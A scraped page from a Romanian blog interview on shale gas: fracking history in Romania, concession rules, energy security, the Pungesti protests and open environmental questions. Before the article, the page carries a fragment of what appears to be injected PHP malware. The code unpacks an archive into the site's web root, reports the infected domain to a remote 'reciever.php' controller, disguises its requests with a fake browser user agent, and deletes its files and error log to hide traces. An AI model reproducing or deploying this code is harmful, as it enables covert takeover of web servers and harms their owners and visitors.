'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Gazele de sist | Dumitru Chisalita

Rss

Gazele de sist

Din toata tulburarea provocata de gazele de sist lipsesc tocmai argumentele stiintifice, inlocuite de argumente, unii le numesc manipulari, emotionale. Explorarea si exploatarea gazelor de sist sunt zugravite in culori apocalipitice, ca generatoare ale unui fel de sfarsit de lume: ape otravite, cutremure, in perspectiva si victime. Cat de mari sunt riscurile unei asemenea exploatari?

 

Metoda fracturarii hidraulice a mai fost folosita in Romania?

Manualul Inginerului Petrolist, volumul 45, apărut la Editura Tehnică în anul 1957, prezenta principiul de fracturarea hidraulică, principiu care nu s-a modificat până în prezent. Scopul fracturarii hidraulice este de a marii cantitatea de gaze care curge dinspre zacamant catre suprafata. Fracturarea hidraulica a fost folosită în România pentru prima data cu mai bine de 50 de ani în urmă in zacamintele conventionale. În anii ’50 au fost efectuate fracturări hidraulice la sonde de pe zăcămintele Zemeş, Tazlău şi Moineşti. Între anii 1993-1995 au fost derulate mai multe fracturări hidraulice la sonde de pe zăcăminte de gaze din Transilvania, la una din aceste operatii asistand personal.

Principiul fracturărării constă în injectarea în strat a unui amestec lichid pe bază de apă, la presiune înaltă, care va pătrunde forţat în roca colectoare, producând una sau mai multe fisuri sau lărgind fisurile existente. Când se opreşte pomparea lichidului de fracturarea, pentru a le menţine deschise si a preveni prabusirea stratelor superioare, se introduc în acestea nisip de diverse granulatii.

 

Doar americanii de la Chevron au licenta de exploatare a gazelor de sist in Romania?

Nu este necesara obtinerea unei licente de exploatare a gazelor conventionale sau neconventionale. Explorarea-dezvoltarea-exploatarea titeiului si a gazelor naturale  se realizeaza pe baza de acorduri petroliere de concesiune, incheiate de Agentia Nationala pentru Resurse Minerale si aprobate de Guvernul Romaniei .

 

Are Romania nevoie sa exploateze gazele de sist din subsolul sau? Ar fi aceasta o cale spre securitatea energetica a Romaniei?

Gradul avansat de epuizarea a acumulărilor de gaze, cunoscute sub forma de zăcăminte de gaz a determinat, în special în SUA, demararea de studii pentru extragerea gazului care nu a apucat să se acumuleze găsindu-se în diverse stadii ale procesului de formare a gazelor (după descompunerea substanţelor organice) şi-sau migrare. Astfel, a apărut noţiunea de GAZ NECONVENŢIONAL. Gazele neconventionale cuprinde si gazele de sist, dar si alte tipuri de gaze care necesita de asemenea exploatarea prin fracturare hidraulica, dar la care cantitatea de apa necesara procesului este mult mai mica fata de gazele de sist.

Epuizarea resurselor de hidrocarburi, lipsa unor perspective concrete de înlocuire a hidrocarburilor la nivelul cererii mondiale de energie, creşterea preţurilor energiei etc., va determina în viitor exploatarea gazelor neconvenţionale.

In fata unui fenomen asemanator, Sofia a cedat si a interzis exploatarea gazelor de sist. Va asteptati sa se intample acelasi lucru si in Romania? Chevron a facut deja un pas inapoi la Pungesti.

Nu cred ca se pot compara situatile din punct de vedere geologic si geopolitic din Romania si Bulgaria, Astfel, modelele bulgaresti nu au reprezentat nicodata o tendinta pentru Romania.

 

Cine ar avea de castigat dintr-o asemenea decizie similara cu a Sofiei?

Gazele neconvenţionale pot să diminueze cantităţile de gaze importate, pot să diminueze cantităţile de energie electrică produsă prin metode regenerabile, sa diminueze subventile si proiectele de energie regenerabila, să diminueze importurile de cărbune şi producţia de cărbune autohton, să determine reducerea cererii de benzina si motorina consumata in Romania etc.

 

Cine are de pierdut din exploatarea resurselor de gaze neconventionale deţiute de România?

Gazele neconvenţionale pot să aducă pe piaţa noi cantitati de gaze, preţuri mai mici ale gazelor fata de pretul gazelor de import, tarife de transport mai mici pentru gaze, surplus de gaze in anumite perioade din an, care sa permita exporturi de gaze, resurse financiare importante pentru Romanai sub forma de taxe, redevente si accize.

 

Cum va explicati protestele starnite de primele manevre de exploare de la Pungesti?

Aparent, este greu de explicat. Aceiasi oameni stau impasibili la o multime de actiuni care „atenteaza”asupra vietii lor:

– servicii sociale, medicale si de invatamant de proasta calitate;

– infrastructura de drumuri si cai ferate defectuoasa,

– institutii ale statului care maresc taxele;

– indatorarea tarii si a administratilor locale.

Toate acestea se intampla zi de zi, fara sa determine revolutii, iesiri in strada, proteste etc.

In opinia mea aceste proteste nu sunt exclusiv ecologiste, ele se bazeaza pe sensibilitatea publicului la acest subiect si este folosita de anumite cercuri.

 

Cum se poate iesi din aceasta dilema periculoasa – presiune publica vs interes strategic al Romaniei?

In fapt nu exista o analiza stiintifica privind avatajele si pericolele pe care le ar aduce gazele de sist in Romania si care sa fie supusa dezbaterii publice. Dezbaterea publica a aparut in lipsa acestei analize si ea are la baza in principal pozitia unor politicieni fata de acest subiect.

Problema gazelor de sist ar trebui dezbatuta dupa ce subiectul este disecat in cateva capitole importante si se obtin raspunsuri pertinete, asupra catorva probleme importante:

A)     Poluarea solului si subsolului in timpul forajului sondelor:

  1. 1.      Care este riscul ca in timpul forajului sa se polueze solul si subsolul, plecand de la istoricul forajelor realizate in Romania?
  2. 2.      Care sunt consecintele unei astfel de poluari si in cat timp pot sa fie ele eliminate?

B)     Epuizarea resurselor locale de apa prin operatia de fracturarea hidraulica – cantitatile mari de apa necesare acestei operatiuni poate sa afecteze resursele de apa ale zonei in care se practica aceasta operatie mergand pana la epuizarea temporara a acestor resurse.

  1. 1.      Care este cantitatea de apa care va fi folosita pentru fracturare hidraulica?
  2. 2.      Cum se poate conditiona efectuarea lucrarilor de fracturare hidraulica, fara a afecta resursa de apa a comunitatilor locale?

C)     Gestionarea apelor rezultate dupa operatia de fracturarea hidraulica – gestionarea acumularilor de ape uzate/contaminate, actiune care se poate intinde pe ani buni, reprezinta o problema importanta in procesul de exloatare a gazelor de sist. Avand in vedere experientele din Romania, cand dupa ce firmele obtin profitul care si l-au propus abandoneaza locatia respectiva, sub diverese forme juridice, ajungandu-se ca gestiunea si responsabilitatea acestora sa nu mai fie a nimanui. Firma „dispare”, autoritatile invoca lipsa banilor si a cadrului juridic, iar oamenii raman cu problemele. Exploatarea gazelor de sist poate să determine peisaje dezolante cu acumulări de apă nepotabila si diminuarea resurselor de apă potabila. Dar, in acelasi timp exista locatii unde o gestiune corespunzatoare a problemelor post – exploatare a gazelor de sist, face ca activitatile umane sa se desfasoare normal.

  1. 1.      Care sunt metodele de gestionare a apelor uzate post forare? Care este riscul ca apele contaminate acumulate la suprafata sa polueze solul si subsolul? Care sunt consecintele unei astfel de poluari si in cat timp pot sa fie ele eliminate?
  2. 2.      Cum se asigura provizioanele necesare pentru gestionarea apelor uzate, post exploatare si inchidere a sondelor, astfel incat locatile sa nu fie abandonate si sa nu determine costuri suplimentare din partea statului sau administratiei locale? Care va fi valoarea acestor provizioane? Cine le va accesa in situatia abandonarii locatiei? Cum vor fi ele folosite?

D)    Disponibilitatea surselor existente de a acoperii cererea de gaze din piata si nevoia de noi resurse

  1. 1.      Evolutia viitoare a cererii din Romania poate fi acoperita din sursele de gaze conventionale existente sau potential a fi descoperite in viitor? Sunt necesare exploatarea gazelor de sist pentru a acoperi cererea de gaze din Romania?
  2. 2.      Se doreste a se exploata gaze de sist pentru a fi exportate sau se doreste o constructie a Romaniei pe principiul Dezvoltarii Durabile si mentinerii acestor resurse pentru generatiile viitoare?

E)     Pretul gazelor din sursele existente (intern/import) vresus pretul gazelor de sist

  1. Va fi pretul gazelor de sist mai mic decat pretul gazelor importate din Federatia Rusa sau din alte surse potentiale?

F)     Disponibilitatea oamenilor de a si mari costurile la unele produse (cum este costul cu energia) pentru protejarea mediului

  1. Respingerea activitatilor de fracturare hidraulica sau a exploatarii gazelor de sist, pe considerente de protejarea mediului, poate determina scoaterea mai multor bani din buzunarul romanilor pentru energie?

Lipsa unui stat corect cultiva o emotionalitate excesiva, lipsa unui Institut de prognoza si analiza macro si microeconomica face sa nu cunoastem „cat rau sau cat bine” poate aduce exploatarea gazelor de sist pentru romani si pentru Romania.